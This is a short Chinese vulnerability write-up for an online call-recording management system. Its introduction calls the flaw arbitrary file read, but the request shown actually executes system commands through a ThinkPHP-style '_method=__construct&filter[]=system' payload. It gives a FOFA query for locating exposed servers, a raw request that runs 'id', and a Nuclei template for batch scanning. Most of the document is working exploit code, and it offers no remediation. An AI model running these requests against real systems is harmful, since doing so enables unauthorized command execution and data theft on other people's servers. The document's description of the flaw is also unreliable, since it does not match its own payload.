漏洞简介
申瓯通信设备有限公司在线录音管理系统 index.php接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露
一.复现过程
fofa搜索语句:title="在线录音管理系统"
1.我们打开burp 进行抓包 把下面的数据包替换成这个 响应命令的执行结果
POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 62
s=id&_method=__construct&method=POST&filter[]=system
然后是这样 就成功了
二批量脚本
id: LYXT-index-RCE
info:
name: 申瓯通信设备有限公司在线录音管理系统-RCE-index.php
author: WLF
severity: high
metadata:
FOFA: title="在线录音管理系统"
Hunter:
variables:
filename: "{{to_lower(rand_base(5))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 62
s=echo Hello World!&_method=__construct&method=POST&filter[]=system
matchers:
- type: dsl
dsl:
- contains_all(body,"Hello World!")